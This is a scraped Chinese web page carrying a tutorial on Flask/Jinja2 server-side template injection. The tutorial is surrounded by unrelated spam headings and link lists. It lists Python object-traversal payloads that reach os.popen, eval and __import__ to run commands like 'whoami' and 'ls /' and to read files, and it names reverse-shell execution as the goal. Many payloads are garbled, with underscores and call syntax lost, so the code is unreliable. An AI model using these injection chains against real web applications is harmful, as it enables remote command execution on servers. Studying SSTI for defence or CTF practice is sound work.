当前位置: 首页 > news >正文

有什么网站可以做婚庆视频深圳自助体检机地址

有什么网站可以做婚庆视频,深圳自助体检机地址,2016网站建设报价表,asp医院网站源码破解版SSTI漏洞注入 SSTI全称Server side template injection.服务端模板注入这节课主要讲flask的模板注入.flask会把类似于 的变量当做参数来渲染并填充到web页面,如果该参数可控并被后台解析则有可能被注入恶意代码导致注入漏洞请注意 模板注入只会存在于二次渲染中,无二次渲染不会…

SSTI漏洞注入

SSTI全称Server side template injection.服务端模板注入这节课主要讲flask的模板注入.flask会把类似于 的变量当做参数来渲染并填充到web页面,如果该参数可控并被后台解析则有可能被注入恶意代码导致注入漏洞请注意 模板注入只会存在于二次渲染中,无二次渲染不会出现模板注入。

注入过程

  1. 确定模板类型
    在这里插入图片描述
  2. 利用魔术方法寻找可命令执行的子类
    魔术方法:
    class 返回类型所属的对象
    mro 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。
    base 返回该对象所继承的基类 // __base__和__mro__都是用来寻找基类的
    subclasses 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表
    init 类的初始化方法
    globals 对包含函数全局变量的字典的引用
    寻找子类:
    Python3:
    使用file类读取文件的方法: <class ‘_frozen_importlib_external.FileLoader’>这个类索引号;
    利用os._warp_close类的 popen函数执行命令:
    [].class.mro[-1].subclasses()[128].init.globals’popen’.read()
    ().class.bases[0].subclasses()[128].init.globals[‘builtins’]‘import’.popen(‘whoami’).read()
    ().class.bases[0].subclasses()[128].init.globals[‘builtins’]‘eval’
    ().class.bases[0].subclasses()[128].init.globals[‘builtins’]‘eval’
    利用os._warp_close类的 open函数读取文件:
    ().class.bases[0].subclasses()[128].init.globals[‘builtins’]‘open’.read()
    Python2:
    利用 warnings.WarningMessage的 linecache执行命令:
    [].class.base.subclasses()[59].init.func_globals[‘linecache’].os.popen(‘whoami’).read()
    ().class.bases[0].subclasses()40.read()
    ().class.bases[0].subclasses()[75].init.globals[‘builtins’]‘eval’
    利用file类读取文件(python2特有):
    ().class.bases[0].subclasses()40.read()
    ().class.bases[0].subclasses()40.readlines()
    存在popen函数的类一般是 os._wrap_close
    [].class.mro[-1].subclasses()[128].init.globals[‘builtins’][‘eval’](‘import(“o”+“s”).popen(“ls /”).read()’)
    思路:找到父类<type ‘object’>–>寻找子类–>找关于命令执行或者文件操作的模块。
    几个含有eval函数的类:
    warnings.catch_warnings
    WarningMessage
    codecs.IncrementalEncoder
    codecs.IncrementalDecoder
    codecs.StreamReaderWriter
    os._wrap_close
    reprlib.Repr
    weakref.finalize
  3. 构造PAYLOAD执行反弹SHELL等命令
    相关链接
http://www.yayakq.cn/news/510093/

相关文章:

  • 潢川网站建设wordpress菜单图标在文字右侧
  • 东莞seo网站优化运营网站排名优化公司哪家好
  • 长沙商城网站东莞资深网站建设
  • 珠海模板网站建设公司门户网站建设招标方
  • seo 网站地图短网址生成网站源码
  • 余姚专业网站建设公司网络营销名词解释答案
  • 政协信息化网站建设的请示做私活的网站
  • 购物网站的建设与维护临沂市建设职工中等专业学校校长
  • 网站建设宣传ppt模板下载网络规划设计师2022论文题目
  • 凡网站建设网站推广常用的方法
  • 网站设计方案要怎么写php手机网站
  • 标准化建设考评网站湖南建设网招标公告
  • 用凡科做网站好吗浏阳做网站的有哪几家
  • 舟山工程建设信息网站广州去东莞回来要隔离吗
  • 深圳设计网站哪个好企业网站多少钱
  • 上海网站建设制作百橙宁波网站建设哪家比较好
  • 海口建站价格烟台网络推广公司
  • 免费网站使用重庆市建设公共资源交易中心网站
  • 门户网站 备案网站平台多少钱
  • 网站目录不能访问asp化妆品网站 后台
  • 儿童 html网站模板网站服务器在哪租
  • 小网站开发用哪些技术建一个信息网站多少钱
  • 酒店类网站开发策略设计网站大全湖南岚鸿网站大全
  • 自己做视频的网站吗广东哪里网站建设
  • 网站开发工程师asp考试试题网站设计建设维护
  • 网站接入空间建网站要几个域名
  • 化妆品行业的网站开发虚拟主机解压wordpress
  • 外贸网站做开关的哪个好西安seo主管
  • 极客 pthyon 做网站专业的网络推广
  • 花木网站模版网站开发 360浏览器